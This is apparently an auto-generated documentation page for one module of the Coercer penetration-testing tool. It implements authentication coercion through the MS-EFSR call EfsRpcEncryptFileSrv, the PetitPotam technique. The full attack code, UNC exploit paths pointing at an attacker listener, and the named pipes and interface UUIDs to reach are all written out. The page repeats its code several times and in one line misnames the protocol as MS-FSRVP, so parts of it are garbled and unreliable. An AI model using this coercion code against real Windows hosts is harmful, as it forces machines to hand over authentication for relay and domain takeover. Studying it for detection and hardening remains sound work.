coercer.methods.MS_EFSR.EfsRpcEncryptFileSrv

  1#!/usr/bin/env python3
  2# -*- coding: utf-8 -*-
  3# File name          : EfsRpcEncryptFileSrv.py
  4# Author             : Podalirius (@podalirius_)
  5# Date created       : 16 Sep 2022
  6
  7
  8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
  9from coercer.network.DCERPCSessionError import DCERPCSessionError
 10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
 11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
 12
 13
class _EfsRpcEncryptFileSrv(NDRCALL):
    """
    Structure to make the RPC call to EfsRpcEncryptFileSrv() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    Only the single ``FileName`` argument is marshalled. It is the field that
    ``EfsRpcEncryptFileSrv.trigger`` fills with ``self.path`` (a UNC path
    pointing at the listener, see ``EfsRpcEncryptFileSrv.exploit_paths``).
    Field order in ``structure`` is the NDR wire order — do not reorder.
    """
    opnum = 4  # Operation number of EfsRpcEncryptFileSrv on the EFSRPC interface
    structure = (
        ('FileName', WSTR),  # Type: wchar_t *
    )
 22
 23
class _EfsRpcEncryptFileSrvResponse(NDRCALL):
    """
    Structure to parse the response of the RPC call to EfsRpcEncryptFileSrv() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    No output fields are declared. ``EfsRpcEncryptFileSrv.trigger`` in this
    module does not parse the response at all; it only reports whether the
    request raised, so this class is kept for completeness / symmetry with
    the request structure.
    """
    structure = ()
 29
 30
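class EfsRpcEncryptFileSrv(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function EfsRpcEncryptFileSrv (opnum 4) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    The request carries a UNC path (one of ``exploit_paths``, rendered into
    ``self.path``) in its ``FileName`` argument, so the target reaches out to
    the listener named in that path. The transports, named pipes and
    interface UUIDs the call can arrive over are declared in ``access``.

    Method found by:
     - [@topotam77](https://twitter.com/topotam77)
    """

    # Path templates for FileName. The ``{{...}}`` placeholders are presumably
    # expanded by the framework (listener address/port, random component)
    # before the call; each ends in an explicit NUL terminator.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Where the EFSRPC interface is reachable: named pipes (with the interface
    # UUID bound on each) and the raw TCP interface UUIDs. These are the same
    # surfaces a defender would monitor or restrict for this method.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    # Keep "opnum" in sync with _EfsRpcEncryptFileSrv.opnum (both are 4).
    function = {
        "name": "EfsRpcEncryptFileSrv",
        "opnum": 4,
        "vulnerable_arguments": ["FileName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one EfsRpcEncryptFileSrv request over ``dcerpc_session`` with
        ``self.path`` as ``FileName``.

        Args:
            dcerpc_session: A bound DCE/RPC session exposing ``request()``;
                ``None`` if ``connect()`` was never called.
            target: Accepted for interface compatibility with the other
                methods; not used by this implementation.

        Returns:
            ``""`` when the request was sent without raising, the raised
            exception object (e.g. a ``DCERPCSessionError`` from the session
            layer) when it did, and ``None`` when ``dcerpc_session`` is
            ``None`` (an error is printed in that case).
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _EfsRpcEncryptFileSrv()
            request['FileName'] = self.path
            # The response declares no fields (_EfsRpcEncryptFileSrvResponse),
            # so its value is discarded; success is simply "did not raise".
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Errors are handed back to the caller rather than propagated, so
            # the framework can report them per path/transport.
            return err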
class EfsRpcEncryptFileSrv(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
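class EfsRpcEncryptFileSrv(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function EfsRpcEncryptFileSrv (opnum 4) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    The request carries a UNC path (one of ``exploit_paths``, rendered into
    ``self.path``) in its ``FileName`` argument, so the target reaches out to
    the listener named in that path. The transports, named pipes and
    interface UUIDs the call can arrive over are declared in ``access``.

    Method found by:
     - [@topotam77](https://twitter.com/topotam77)
    """

    # Path templates for FileName. The ``{{...}}`` placeholders are presumably
    # expanded by the framework (listener address/port, random component)
    # before the call; each ends in an explicit NUL terminator.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Where the EFSRPC interface is reachable: named pipes (with the interface
    # UUID bound on each) and the raw TCP interface UUIDs. These are the same
    # surfaces a defender would monitor or restrict for this method.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    # Keep "opnum" in sync with _EfsRpcEncryptFileSrv.opnum (both are 4).
    function = {
        "name": "EfsRpcEncryptFileSrv",
        "opnum": 4,
        "vulnerable_arguments": ["FileName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one EfsRpcEncryptFileSrv request over ``dcerpc_session`` with
        ``self.path`` as ``FileName``.

        Args:
            dcerpc_session: A bound DCE/RPC session exposing ``request()``;
                ``None`` if ``connect()`` was never called.
            target: Accepted for interface compatibility with the other
                methods; not used by this implementation.

        Returns:
            ``""`` when the request was sent without raising, the raised
            exception object (e.g. a ``DCERPCSessionError`` from the session
            layer) when it did, and ``None`` when ``dcerpc_session`` is
            ``None`` (an error is printed in that case).
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _EfsRpcEncryptFileSrv()
            request['FileName'] = self.path
            # The response declares no fields (_EfsRpcEncryptFileSrvResponse),
            # so its value is discarded; success is simply "did not raise".
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Errors are handed back to the caller rather than propagated, so
            # the framework can report them per path/transport.
            return err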

Coercing a machine to authenticate using function EfsRpcEncryptFileSrv (opnum 4) of MS-FSRVP Protocol

Method found by:

exploit_paths = [('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access = {'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol = {'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
function = {'name': 'EfsRpcEncryptFileSrv', 'opnum': 4, 'vulnerable_arguments': ['FileName']}
def trigger(self, dcerpc_session, target):
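    def trigger(self, dcerpc_session, target):
        """
        Send one EfsRpcEncryptFileSrv request over ``dcerpc_session`` with
        ``self.path`` as ``FileName``.

        Args:
            dcerpc_session: A bound DCE/RPC session exposing ``request()``;
                ``None`` if ``connect()`` was never called.
            target: Accepted for interface compatibility with the other
                methods; not used by this implementation.

        Returns:
            ``""`` when the request was sent without raising, the raised
            exception object (e.g. a ``DCERPCSessionError`` from the session
            layer) when it did, and ``None`` when ``dcerpc_session`` is
            ``None`` (an error is printed in that case).
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _EfsRpcEncryptFileSrv()
            request['FileName'] = self.path
            # The response declares no fields (_EfsRpcEncryptFileSrvResponse),
            # so its value is discarded; success is simply "did not raise".
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Errors are handed back to the caller rather than propagated, so
            # the framework can report them per path/transport.
            return err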